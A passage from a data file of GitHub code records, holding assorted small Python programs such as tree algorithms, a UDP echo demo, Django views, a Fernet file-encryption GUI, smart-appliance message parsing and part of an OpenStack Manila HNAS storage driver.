if self.step % 10 == 0:\r\n self.points += 1\r\n","repo_name":"Konstantin-create/Google-Dino-Python","sub_path":"sprites/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"28339015857","text":"class Node:\n\t\n def __init__(self, key):\n self.key = key\n self.left = None\n self.right = None\n\t\n\ndef findLCA(root, n1, n2):\n\t\n\t\n if root is None:\n return None\n\n\t\n if root.key == n1 or root.key == n2:\n return root\n\n left_lca = findLCA(root.left, n1, n2)\n right_lca = findLCA(root.right, n1, n2)\n\n\t\n if left_lca and right_lca:\n return root\n\n return left_lca if left_lca is not None else right_lca\n\n\n\nroot = Node(1)\nroot.left = Node(2)\nroot.right = Node(3)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\nroot.right.left = Node(6)\nroot.right.right = Node(7)\nprint(\"LCA(3,7) = \", findLCA(root, 3, 7).key)\n\n\"\"\"\nThe time complexity of the above solution is O(n) as the method does a simple tree traversal \nThe space complexity of the above solution is O(1)\n\"\"\"\n","repo_name":"AshikurRahman-sec/Bongo","sub_path":"Problem three.py","file_name":"Problem three.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21956407123","text":"import cv2\nimport numpy as np\nfrom student_code import my_imfilter, create_hybrid_image\nfrom unit_tests import test_fft_blur\nimport matplotlib.pyplot as plt\nfrom utils import vis_hybrid_image, load_image, save_image\n\ndef main():\n\tcutoff_frequency = 7\n\tfilter = cv2.getGaussianKernel(ksize=cutoff_frequency * 4 + 1,\n\t sigma=cutoff_frequency)\n\tfilter = np.dot(filter, filter.T)\n\n\t# Filtering example\n\t# dog = load_image('../data/dog.bmp')\n\t# dog_blurred = my_imfilter(dog, filter)\n\t# save_image('../results/dog_blurred.jpg', dog_blurred)\n\n\t# Black and white hybrid\n\teinstein = load_image('../data/einstein.bmp')\n\tmarilyn = load_image('../data/marilyn.bmp')\n\t# low, high, hybrid = create_hybrid_image(marilyn, einstein, filter)\n\t# high = np.clip(high, 0, 255)\n\t# vis = vis_hybrid_image(hybrid)\n\t# plt.figure()\n\t# plt.imshow((low * 255).astype(np.uint8))\n\t# plt.figure()\n\t# plt.imshow(((high + 0.5) * 255).astype(np.uint8))\n\t# plt.figure(figsize=(20, 20))\n\t# plt.imshow(vis)\n\t# save_image('../results/einstein_high.jpg', high)\n\t# save_image('../results/einstein_high_boosted.jpg', high+0.5)\n\t# save_image('../results/marilyn_low.jpg', low)\n\t# save_image('../results/einrilyn.jpg', hybrid)\n\t# save_image('../results/einrilyn_vis.jpg', vis)\n\n\t# Bike Motorcycle hybrid\n\tbike = load_image('../data/bicycle.bmp')\n\tmotorcycle = load_image('../data/motorcycle.bmp')\n\t# low, high, hybrid = create_hybrid_image(bike, motorcycle, filter)\n\t# high = np.clip(high, 0, 255)\n\t# vis = vis_hybrid_image(hybrid)\n\t# plt.figure()\n\t# plt.imshow((low * 255).astype(np.uint8))\n\t# plt.figure()\n\t# plt.imshow(((high + 0.5) * 255).astype(np.uint8))\n\t# plt.figure(figsize=(20, 20))\n\t# plt.imshow(vis)\n\t# save_image('../results/motorcycle_high.jpg', high)\n\t# save_image('../results/bike_low.jpg', low)\n\t# save_image('../results/motorbike.jpg', hybrid)\n\t# save_image('../results/motorbike_vis.jpg', vis)\n\n\t# Chicken/dinosaur hybrid\n\tdino = load_image('../data/dinosaur.jpg')\n\tchicken = load_image('../data/chicken.jpg')\n\tlow, high, hybrid = create_hybrid_image(chicken, dino, filter)\n\tvis = vis_hybrid_image(hybrid)\n\t# plt.figure()\n\t# plt.imshow((low * 255).astype(np.uint8))\n\t# plt.figure()\n\t# plt.imshow(((high + 0.5) * 255).astype(np.uint8))\n\t# plt.figure(figsize=(20, 20))\n\t# plt.imshow(vis)\n\tsave_image('../results/dino_high.jpg', high)\n\tsave_image('../results/chicken_low.jpg', low)\n\tsave_image('../results/chickno.jpg', hybrid)\n\tsave_image('../results/chickno_vis.jpg', vis)\n\n\t# Convolution steps\n\t# sub = load_image(\"../data/submarine.bmp\")\n\t# shifted, low = test_fft_blur(sub, filter)\n\t# save_image('../results/sub_blurred.jpg', low)\n\t# save_image('../results/sub_shifted.jpg', shifted)\n\tplt.show()\n\nmain()\n","repo_name":"isw4/CVision01-Filtering","sub_path":"src/cases_for_report.py","file_name":"cases_for_report.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70957343403","text":"def batched(iterable, length):\n \"\"\"\n Simple implementation of itertools.batched from Python 12.\n Generator that yields chunks of length (length) from the iterable.\n \"\"\"\n\n cursor = 0\n while cursor < len(iterable):\n yield iterable[cursor:cursor + length]\n cursor += length\n","repo_name":"fixermark/brilliant-monocle-driver-python","sub_path":"src/brilliant_monocle_driver/batched.py","file_name":"batched.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"73301685482","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport socket\nimport random\nimport argparse\nfrom datetime import datetime\n\ndef server(hostname, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((hostname, port))\n print('Listening at {}'.format(sock.getsockname()))\n while True:\n data, address = sock.recvfrom(65536)\n if random.random() < 0.5:\n print('Pretending to drop packet from {}'.format(address))\n continue\n text = data.decode('utf-8')\n print('The client at {}, say {!r}'.format(address, text))\n text = 'Your data was {} bytes long'.format(len(data))\n sock.sendto(text.encode('utf-8'), address)\n\ndef client(hostname, port):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n text = '[{}] Hi, how are you?'.format(datetime.now())\n data = text.encode('utf-8')\n sock.connect((hostname, port))\n print('The OS assigned me the address {}'.format(sock.getsockname()))\n delay = 0.1\n while True:\n sock.send(data)\n print('Waiting up to {} seconds for a reply'.format(delay))\n sock.settimeout(delay)\n try:\n data = sock.recv(65536)\n except socket.timeout:\n delay *= 2\n if delay > 2.0:\n raise RuntimeError('I think the server is down')\n else:\n break\n text = data.decode('utf-8')\n print('The server {} replied {!r}'.format(sock.getpeername(), text))\n\nif __name__ == '__main__':\n choices = {'client': client, 'server': server}\n parser = argparse.ArgumentParser(description='Send and receive UDP locally')\n parser.add_argument('role',\n choices=choices,\n help='which role to play')\n parser.add_argument('host',\n help='interface the server listen at;'\n 'host the client sends to')\n parser.add_argument('-p',\n metavar='PORT',\n type=int,\n default=1060)\n args = parser.parse_args()\n function = choices[args.role]\n function(args.host, args.p)\n","repo_name":"alpha-eric/py3","sub_path":"udp_random.py","file_name":"udp_random.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8482595238","text":"# Crie um programa que tenha a função leiaInt(), que vai funcionar de forma semelhante ‘a função input() do Python, só que fazendo a validação para aceitar apenas um valor numérico. Ex: n = leiaInt(‘Digite um n: ‘)\ndef leiaint(n):\n while True:\n num = input(n)\n if num.isnumeric():\n return num\n else:\n print('\\033[31mERRO! Digite um número válido\\033[m')\n\n\n\n\nn = leiaint('Digite um número: ')\n\nprint(f'O número digitado é: {n}')","repo_name":"RodrigoArgenton/testepython","sub_path":"3 - Mundo 3/4 - Função/desafio104.py","file_name":"desafio104.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"21991535921","text":"# Standard library imports\nimport pathlib\nimport sys\nimport re\nimport math\nimport functools\nimport time\nfrom itertools import product\n\n\ndef parse(puzzle_input):\n \"\"\"Parse input\"\"\"\n return [[parse_line(line) for line in block.splitlines()] for block in puzzle_input.split(\"inp w\\n\")][1:]\n\n\ndef parse_line(line):\n values = line.split(\" \")\n operation = values[0]\n return operation, values[1:]\n\n\ndef part1(data):\n \"\"\"Solve part 1\"\"\"\n failed_attempts = [set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set()]\n result = \"-1\"\n for w in range(1, 10):\n result = do_operations_on(w, 0, 0, 0, data, failed_attempts)\n if result != \"-1\":\n return result\n print(\"loop\")\n\n # memory = [SpotValue(\"val\", \"w0\", \"\"), SpotValue(\"val\", 0, \"\"), SpotValue(\"val\", 0, \"\"), SpotValue(\"val\", 0, \"\")]\n # for i in range(len(data[:4])):\n # memory[0] = SpotValue(\"val\", \"w\" + str(i), \"\")\n # for operator, values in data[i]:\n # print(operator, values)\n # pos = convert_to_mem(values[0])\n # first = memory[pos]\n # second = get_value(values[1], memory)\n # memory[pos] = SpotValue(operator, first, second)\n # memory[pos] = memory[pos].simplify()\n # print_memory(memory)\n\n return result\n\n\ndef print_memory(memory):\n print(\"w=\", memory[0].to_string(), \", x=\", memory[1].to_string(), \", y=\", memory[2].to_string(), \", z=\",\n memory[3].to_string())\n\n\nclass SpotValue:\n\n def __init__(self, ope, first, second):\n self.ope = ope\n self.first = first\n self.second = second\n\n def to_string(self):\n if isinstance(self.first, SpotValue):\n s1 = self.first.to_string()\n else:\n s1 = str(self.first)\n if isinstance(self.second, SpotValue):\n s2 = self.second.to_string()\n else:\n s2 = str(self.second)\n\n if self.ope == \"val\":\n return s1\n elif self.ope == \"add\":\n return \"(\" + s1 + \"+\" + s2 + \")\"\n elif self.ope == \"mul\":\n return s1 + \"*\" + s2\n elif self.ope == \"div\":\n return s1 + \"//\" + s2\n elif self.ope == \"eql\":\n return s1 + \"==\" + s2\n elif self.ope == \"mod\":\n return \"(\" + s1 + \")%\" + s2\n\n def contains_multiply(self):\n print(self.to_string())\n if self.ope == \"val\":\n return False\n if self.ope == \"mul\":\n return True\n if self.ope == \"add\":\n return self.first.contains_multiply() or self.second.contains_multiply()\n print(\"no contains_multiply\", self.to_string())\n\n def simplify(self):\n if self.ope == \"mul\":\n if self.second.ope == \"val\":\n if self.second.first == 0:\n return SpotValue(\"val\", 0, \"\")\n elif self.second.first == 1:\n return self.first\n if self.first.ope == \"val\":\n if self.first.first == 0:\n return SpotValue(\"val\", 0, \"\")\n elif self.first.first == 1:\n return self.second\n elif self.ope == \"add\":\n if self.first.ope == \"val\" and self.first.first == 0:\n return self.second\n if self.second.ope == \"val\" and self.second.first == 0:\n return self.first\n if self.first.ope == \"val\" and self.second.ope == \"val\" and not isinstance(self.first.first,\n str) and not isinstance(\n self.second.first, str):\n return SpotValue(\"val\", self.first.first + self.second.first, \"\")\n elif self.ope == \"mod\" and self.second.ope == \"val\" and not isinstance(self.second.first, str):\n modulo = self.second.first\n # if self.first.ope == \"mul\" and self.first.second.ope == \"val\" and self.first.second.first == modulo:\n # return SpotValue(\"val\", 0, \"\")\n if self.first.contains_multiply():\n self.first = self.first.recursive_mod(modulo).simplify()\n if not self.first.contains_multiply():\n range_start, range_end = self.first.range()\n if range_end < modulo and 0 <= range_start:\n return self.first\n elif range_start == range_end:\n return SpotValue(\"val\", range_end % modulo, \"\")\n elif self.ope == \"div\":\n if self.second.ope == \"val\" and self.second.first == 1:\n return self.first\n elif self.ope == \"eql\":\n range1_start, range1_end = self.first.range()\n range2_start, range2_end = self.second.range()\n if range1_end < range2_start or range2_end < range1_start:\n return SpotValue(\"val\", 0, \"\")\n elif range1_start == range1_end and range1_end == range2_start and range2_start == range2_end:\n return SpotValue(\"val\", 1, \"\")\n return self\n\n def range(self):\n if self.ope == \"val\":\n if isinstance(self.first, str):\n return 1, 9\n else:\n return self.first, self.first\n elif self.ope == \"add\":\n range1_start, range1_end = self.first.range()\n range2_start, range2_end = self.second.range()\n return range1_start + range2_start, range1_end + range2_end\n print(\"no range\", self.to_string())\n\n def recursive_mod(self, modulo):\n if self.ope == \"add\":\n self.first = self.first.recursive_mod(modulo)\n self.second = self.second.recursive_mod(modulo)\n elif self.ope == \"mul\" and self.second.ope == \"val\" and self.second.first == modulo:\n return SpotValue(\"val\", 0, \"\")\n item = self.simplify()\n return item\n\n def copy(self):\n if self.ope == \"val\":\n return SpotValue(\"val\", self.first, self.second)\n else:\n return SpotValue(self.ope, self.first.copy(), self.second.copy())\n\n\ndef do_operations_on(w, x, y, z, blocks, failed_attempts):\n if len(blocks) == 0:\n if z == 0:\n return \"\"\n else:\n return \"-1\"\n key = (w, x, y, z)\n if key in failed_attempts[len(blocks) - 1]:\n return \"-1\"\n failed_attempts[len(blocks) - 1].add(key)\n block = blocks[0]\n memory = [w, x, y, z]\n for operation, values in block:\n pos = convert_to_mem(values[0])\n second = get_value_on(values[1], memory)\n\n if operation == \"add\":\n memory[pos] += second\n elif operation == \"mul\":\n memory[pos] *= second\n elif operation == \"div\":\n memory[pos] = memory[pos] // second\n elif operation == \"mod\":\n memory[pos] = memory[pos] % second\n elif operation == \"eql\":\n if second == memory[pos]:\n memory[pos] = 1\n else:\n memory[pos] = 0\n else:\n print(\"not working\")\n result = \"-1\"\n for w2 in range(1, 10):\n # result = do_operations_on(w2, memory[1], memory[2], memory[3], blocks[1:], failed_attempts)\n result = do_operations_on(w2, 0, 0, memory[3], blocks[1:], failed_attempts)\n if len(blocks) > 11:\n print(len(blocks), len(failed_attempts[13]), len(failed_attempts[12]), len(failed_attempts[11]),\n len(failed_attempts[0]))\n if result != \"-1\":\n print(\"succes\")\n return str(w) + result\n return result\n\n\ndef get_value(char, memory):\n if char in [\"w\", \"x\", \"y\", \"z\"]:\n return memory[convert_to_mem(char)].copy()\n return SpotValue(\"val\", int(char), \"\")\n\n\ndef get_value_on(char, memory):\n if char in [\"w\", \"x\", \"y\", \"z\"]:\n return memory[convert_to_mem(char)]\n return int(char)\n\n\ndef convert_to_mem(char):\n if char == \"w\":\n return 0\n if char == \"x\":\n return 1\n if char == \"y\":\n return 2\n if char == \"z\":\n return 3\n\n\ndef part2(data):\n \"\"\"Solve part 2\"\"\"\n\n\ndef solve(path):\n \"\"\"Solve the puzzle for the given input\"\"\"\n\n puzzle_input = pathlib.Path(path).read_text().strip()\n data = parse(puzzle_input)\n start_1 = time.time()\n solution1 = part1(data)\n end_1 = time.time()\n print(\"time part 1:\", end_1 - start_1)\n\n puzzle_input = pathlib.Path(path).read_text().strip()\n data = parse(puzzle_input)\n start_2 = time.time()\n solution2 = part2(data)\n end_2 = time.time()\n print(\"time part 2:\", end_2 - start_2)\n\n return solution1, solution2\n\n\nif __name__ == \"__main__\":\n for path in sys.argv[1:]:\n print(f\"{path}:\")\n solutions = solve(path)\n print(\"\\n\".join(str(solution) for solution in solutions))\n","repo_name":"Artuur-Oerlemans/adventOfCode2021","sub_path":"src/day24/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39727181961","text":"x = lambda a:a*a\nprint(x(2))\n\ndef anew(x):\n return(lambda y:x+y)\np = anew(4)\nprint(p(8))\n## filter () ..\n\na = [1,2,3,4,6,8,10]\na_new = list(filter(lambda a:(a%2==0),a))\nprint(a_new)\n\n## map()\n\nb = [2,3,4,5,6,7,8,9]\nb_new = list(map(lambda b:(b%3==0),b))\nprint(b_new)\n##Reduce(function,sequence)\nfrom functools import reduce\nc_new = reduce(lambda a,b:a+b,[1,2,3,4,5])\nprint(c_new)\n\nd = lambda a,b:(a**2+2*a*b+b**2)\nprint(d(2,3))\n\n# Higher order function\nh_sam = lambda x,a_new:x+a_new(x)\n\nprint(h_sam(2,lambda x:x*2))\n\nfrom functools import reduce\nprint((lambda *args:sum(args))(1,2,3,4))\nlst = [2,3,4,5]\nx = map(lambda x:x+1,filter(lambda x:x>=3,lst))\nprint(list(x))\ny = reduce(lambda x:x+x,filter(lambda x:(x>=3),lst))\nprint(y)","repo_name":"Vimala390/Vimala_py","sub_path":"sam_lambda.py","file_name":"sam_lambda.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33670859394","text":"from ...core.message import (\n MessageType,\n MessageRequest,\n MessageResponse,\n MessageBody,\n)\n\n\nclass MessageCDBase(MessageRequest):\n def __init__(self, protocol_version, message_type, body_type):\n super().__init__(\n device_type=0xCD,\n protocol_version=protocol_version,\n message_type=message_type,\n body_type=body_type\n )\n\n @property\n def _body(self):\n raise NotImplementedError\n\n\nclass MessageQuery(MessageCDBase):\n def __init__(self,protocol_version):\n super().__init__(\n protocol_version=protocol_version,\n message_type=MessageType.query,\n body_type=0x01)\n\n @property\n def _body(self):\n return bytearray([0x01])\n\n\nclass MessageSet(MessageCDBase):\n def __init__(self,protocol_version):\n super().__init__(\n protocol_version=protocol_version,\n message_type=MessageType.set,\n body_type=0x01)\n self.power = False\n self.target_temperature = 0\n self.aux_heating = False\n self.fields = {}\n self.mode = 1\n\n def read_field(self, field):\n value = self.fields.get(field, 0)\n return value if value else 0\n\n @property\n def _body(self):\n power = 0x01 if self.power else 0x00\n mode = self.mode + 1\n target_temperature = round(self.target_temperature * 2 + 30)\n return bytearray([\n 0x01, power, mode, target_temperature,\n self.read_field(\"trValue\"),\n self.read_field(\"openPTC\"),\n self.read_field(\"ptcTemp\"),\n 0 # self.read_field(\"byte8\")\n ])\n\n\nclass CDGeneralMessageBody(MessageBody):\n def __init__(self, body):\n super().__init__(body)\n self.power = (body[2] & 0x01) > 0\n self.target_temperature = round((body[3] - 30) / 2)\n if (body[2] & 0x02) > 0:\n self.mode = 0\n elif (body[2] & 0x04) > 0:\n self.mode = 1\n elif (body[2] & 0x08) > 0:\n self.mode = 2\n self.current_temperature = round((body[4] - 30) / 2)\n self.condenser_temperature = (body[7] - 30) / 2\n self.outdoor_temperature = (body[8] - 30) / 2\n self.compressor_temperature = (body[9] - 30) / 2\n self.max_temperature = round((body[10] - 30) / 2)\n self.min_temperature = round((body[11] - 30) / 2)\n self.compressor_status = (body[27] & 0x08) > 0\n if (body[28] & 0x20) > 0:\n self.mode = 3\n\nclass CD02MessageBody(MessageBody):\n def __init__(self, body):\n super().__init__(body)\n self.fields = {}\n self.power = (body[2] & 0x01) > 0\n self.mode = body[3]\n self.target_temperature = round((body[4] - 30) / 2)\n self.fields[\"trValue\"] = body[5]\n self.fields[\"openPTC\"] = body[5]\n self.fields[\"ptcTemp\"] = body[7]\n self.fields[\"byte8\"] = body[8]\n\n\nclass MessageCDResponse(MessageResponse):\n def __init__(self, message):\n super().__init__(message)\n if self.message_type in [MessageType.query, MessageType.notify2]:\n self.set_body(CDGeneralMessageBody(super().body))\n elif self.message_type == MessageType.set and self.body_type == 0x01:\n self.set_body(CD02MessageBody(super().body))\n self.set_attr()\n","repo_name":"georgezhao2010/midea_ac_lan","sub_path":"custom_components/midea_ac_lan/midea/devices/cd/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":836,"dataset":"github-code","pt":"18"} +{"seq_id":"28829265584","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate\n\nfrom django.views import generic\nfrom django.urls import reverse_lazy\n\nfrom .forms import CustomUserCreationForm\nfrom thehub import models as hubModels\n\n\n# Create your views here.\n\n# Sign up view, using built-in class based view so it is easier to maintain and deploy\n# Read more here: https://docs.djangoproject.com/en/2.0/topics/class-based-views/intro/\nclass SignUp(generic.CreateView):\n form_class = CustomUserCreationForm\n success_url = reverse_lazy(\"login\")\n template_name = \"userprofile/signup.html\"\n\n def get(self, request):\n # Customize the get method, the post method is handled for us by built-in function\n\n if request.user.is_authenticated:\n # Redirect user to the profile page if they already login and try to sign up\n return redirect(\"profile\")\n else:\n form = self.form_class()\n return render(request, self.template_name, {\"form\": form})\n\n\n@login_required(login_url=\"login\", redirect_field_name=\"profile\")\ndef profile(request):\n user = request.user\n projects = hubModels.Project.objects.get_project_of_user(user.username)\n subscriptions = hubModels.Project.objects.get_project_subscribed_by(user.username)\n\n # Get all post that the user should be involded or interested in (project member)\n # THIS INCLUDES PROJECTS IN SUBSCRIPTIONS AS WELL\n posts = hubModels.Post.objects.get_parent_posts_user_interested(user.username)\n children_posts = {}\n\n if posts:\n posts = posts.order_by(\"-id\")\n # Get all children of relevant post\n for post in posts:\n post_id = post.pk\n # Let's children post be ordered by oldest first to make a flow for the conversation\n children_posts[post_id] = hubModels.Post.objects.get_chilren_of_post(post_id)\n\n owned_projects = hubModels.Project.objects.get_project_owned_by(user.username)\n pending_requests = None\n for project in owned_projects:\n if pending_requests is None:\n pending_requests = hubModels.MemberRequest.objects.get_requests_for_project(project)\n else:\n pending_requests = pending_requests | hubModels.MemberRequest.objects.get_requests_for_project(project)\n\n return render(request, 'userprofile/profile.html', {\"projects\":projects,\n \"subscriptions\": subscriptions,\n \"posts\": posts,\n \"children_posts\": children_posts,\n \"pending_requests\": pending_requests})\n","repo_name":"amandadoan/Idea-Hub","sub_path":"IdeaHub/userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11006009011","text":"import PySide2\nimport sys\nfrom PySide2.QtWidgets import QPushButton, QLineEdit, QApplication, QVBoxLayout, QGridLayout, QWidget, QFileDialog\nfrom PySide2.QtGui import QFont\nfrom PySide2.QtCore import Qt\nfrom cryptography.fernet import Fernet\nimport os\nWIDGET_HEIGHT = 40\n\n\nclass Window(QWidget):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setFont(QFont(\"Berlin Sans FB\", 10))\n self.setWindowTitle(\"File ENC\")\n self.setFixedSize(500, 220)\n\n self.btn_src = QPushButton(\"browse\")\n self.btn_dst = QPushButton(\"browse\")\n self.btn_enc = QPushButton(\"Encrypt\")\n self.btn_dec = QPushButton(\"Decrypt\")\n self.btn_src.setFixedSize(60, WIDGET_HEIGHT)\n self.btn_dst.setFixedSize(60, WIDGET_HEIGHT)\n self.btn_src.clicked.connect(self.open_file_dialog)\n self.btn_dst.clicked.connect(self.open_dir_dialog)\n self.btn_enc.clicked.connect(self.encrypt_file)\n self.btn_dec.clicked.connect(self.decrypt_file)\n\n self.LE_file_path = QLineEdit()\n self.LE_file_path.setPlaceholderText(\"Source File Path...\")\n self.LE_file_path.setFixedHeight(WIDGET_HEIGHT)\n self.LE_file_path.setReadOnly(True)\n\n self.LE_dir_path = QLineEdit()\n self.LE_dir_path.setPlaceholderText(\"Destination Path...\")\n self.LE_dir_path.setFixedHeight(WIDGET_HEIGHT)\n self.LE_dir_path.setReadOnly(True)\n\n self.LE_key = QLineEdit()\n self.LE_key.setPlaceholderText(\"Enter the Cipher Key...\")\n self.LE_key.setFixedHeight(WIDGET_HEIGHT)\n\n layout = QGridLayout()\n layout.setRowMinimumHeight(0, 30)\n layout.addWidget(self.btn_src, 0, 1)\n layout.addWidget(self.btn_dst, 1, 1)\n layout.addWidget(self.btn_enc, 3, 0, 1, 2, alignment=Qt.AlignHCenter)\n layout.addWidget(self.btn_dec, 4, 0, 1, 2, alignment=Qt.AlignHCenter)\n layout.addWidget(self.LE_file_path, 0, 0)\n layout.addWidget(self.LE_dir_path, 1, 0)\n layout.addWidget(self.LE_key, 2, 0, 1, 2)\n layout.setHorizontalSpacing(10)\n layout.setHorizontalSpacing(0)\n print(layout.rowStretch(0))\n self.setLayout(layout)\n self.show()\n\n def open_file_dialog(self):\n fname = QFileDialog.getOpenFileName(self, \"Select File\")\n self.LE_file_path.setText(fname[0])\n\n def open_dir_dialog(self):\n file = QFileDialog.getExistingDirectory(self, \"Select Directory\")\n self.LE_dir_path.setText(file)\n\n def encrypt_file(self):\n cipher = Fernet(self.LE_key.text())\n with open(self.LE_file_path.text(), 'rb') as f:\n data = f.read()\n with open(f\"{self.LE_dir_path.text()}\\\\enc_{os.path.basename(self.LE_file_path.text())}\", 'wb') as f:\n f.write(cipher.encrypt(data))\n\n def decrypt_file(self):\n cipher = Fernet(self.LE_key.text())\n with open(self.LE_file_path.text(), 'rb') as f:\n data = f.read()\n with open(f\"{self.LE_dir_path.text()}\\\\dec_{os.path.basename(self.LE_file_path.text())}\", 'wb') as f:\n f.write(cipher.decrypt(data))\n\n\nif __name__ == \"__main__\":\n app = QApplication()\n window = Window()\n sys.exit(app.exec_())\n","repo_name":"Rasco101/RepoTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29007462019","text":"#using recursion\nfrom collections import defaultdict\nclass Graph:\n def __init__(self, n):\n self.n= n\n self.graph= defaultdict(list)\n\n def addedge(self, v1, v2):\n self.graph[v1].append(v2)\n def dfsutil(self, s, visited):\n visited.add(s)\n print(s)\n for i in self.graph[s]:\n if i not in visited:\n self.dfsutil(i, visited)\n def dfs(self, s):\n visited= set()\n self.dfsutil(s, visited)\n \ng= Graph(6)\ng.addedge(0,1)\ng.addedge(0,3)\ng.addedge(3,4)\ng.addedge(3,5)\ng.addedge(1,2)\nprint(g.graph)\ng.dfs(0)\n","repo_name":"dstreta47/GraphsPractice","sub_path":"dfs_bfs.py","file_name":"dfs_bfs.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7592382774","text":"from oslo_concurrency import processutils\nfrom oslo_log import log\nfrom oslo_utils import units\nimport paramiko\nimport six\n\nimport time\n\nfrom manila import exception\nfrom manila.i18n import _\nfrom manila.i18n import _LE\nfrom manila.i18n import _LW\nfrom manila import utils as mutils\n\nLOG = log.getLogger(__name__)\n\n\nclass HNASSSHBackend(object):\n def __init__(self, hnas_ip, hnas_username, hnas_password, ssh_private_key,\n cluster_admin_ip0, evs_id, evs_ip, fs_name, job_timeout):\n self.ip = hnas_ip\n self.port = 22\n self.user = hnas_username\n self.password = hnas_password\n self.priv_key = ssh_private_key\n self.admin_ip0 = cluster_admin_ip0\n self.evs_id = six.text_type(evs_id)\n self.fs_name = fs_name\n self.evs_ip = evs_ip\n self.sshpool = None\n self.job_timeout = job_timeout\n\n def get_stats(self):\n \"\"\"Get the stats from file-system.\n\n :returns:\n fs_capacity.size = Total size from filesystem.\n available_space = Free space currently on filesystem.\n \"\"\"\n command = ['df', '-a', '-f', self.fs_name]\n output, err = self._execute(command)\n\n line = output.split('\\n')\n fs_capacity = Capacity(line[3])\n\n available_space = fs_capacity.size - fs_capacity.used\n\n LOG.debug(\"Total space in file system: %(total)s GB.\",\n {'total': fs_capacity.size})\n LOG.debug(\"Used space in the file system: %(used)s GB.\",\n {'used': fs_capacity.used})\n LOG.debug(\"Available space in the file system: %(space)s GB.\",\n {'space': available_space})\n\n return fs_capacity.size, available_space\n\n def allow_access(self, share_id, host, share_proto, permission='rw'):\n \"\"\"Allow access to the share.\n\n :param share_id: ID of share that access will be allowed.\n :param host: Host to which access will be allowed.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :param permission: permission (e.g. 'rw', 'ro') that will be allowed.\n \"\"\"\n # check if the share exists\n self.ensure_share(share_id, share_proto)\n export = self._nfs_export_list(share_id)\n\n # get the list that contains all the hosts allowed on the share\n host_list = export[0].export_configuration\n\n if permission in ('ro', 'rw'):\n host_access = host + '(' + permission + ')'\n else:\n msg = (_(\"Permission should be 'ro' or 'rw' instead \"\n \"of %s\") % permission)\n raise exception.HNASBackendException(msg=msg)\n\n # check if the host(s) is already allowed\n if any(host in x for x in host_list):\n if host_access in host_list:\n LOG.debug(\"Host: %(host)s is already allowed.\",\n {'host': host})\n else:\n # remove all the hosts with different permissions\n host_list = [\n x for x in host_list if not x.startswith(host)]\n # add the host with new permission\n host_list.append(host_access)\n self._update_access_rule(share_id, host_list)\n else:\n host_list.append(host_access)\n self._update_access_rule(share_id, host_list)\n\n def deny_access(self, share_id, host, share_proto, permission):\n \"\"\"Deny access to the share.\n\n :param share_id: ID of share that access will be denied.\n :param host: Host to which access will be denied.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :param permission: permission (e.g. 'rw', 'ro') that will be denied.\n \"\"\"\n # check if the share exists\n self.ensure_share(share_id, share_proto)\n export = self._nfs_export_list(share_id)\n\n # get the list that contains all the hosts allowed on the share\n host_list = export[0].export_configuration\n\n if permission in ('ro', 'rw'):\n host_access = host + '(' + permission + ')'\n else:\n msg = (_(\"Permission should be 'ro' or 'rw' instead \"\n \"of %s\") % permission)\n raise exception.HNASBackendException(msg=msg)\n\n # check if the host(s) is already not allowed\n if host_access not in host_list:\n LOG.debug(\"Host: %(host)s is already not allowed.\",\n {'host': host})\n else:\n # remove the host on host_list\n host_list.remove(host_access)\n self._update_access_rule(share_id, host_list)\n\n def delete_share(self, share_id, share_proto):\n \"\"\"Deletes share.\n\n It uses tree-delete-job-submit to format and delete virtual-volumes.\n Quota is deleted with virtual-volume.\n :param share_id: ID of share that will be deleted.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n \"\"\"\n try:\n self.ensure_share(share_id, share_proto)\n except exception.HNASBackendException as e:\n LOG.warning(_LW(\"Share %s does not exist on backend anymore.\"),\n share_id)\n LOG.exception(six.text_type(e))\n\n self._nfs_export_del(share_id)\n self._vvol_delete(share_id)\n\n LOG.debug(\"Export and share successfully deleted: %(shr)s on Manila.\",\n {'shr': share_id})\n\n def ensure_share(self, share_id, share_proto):\n \"\"\"Ensure that share is exported.\n\n :param share_id: ID of share that will be checked.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is 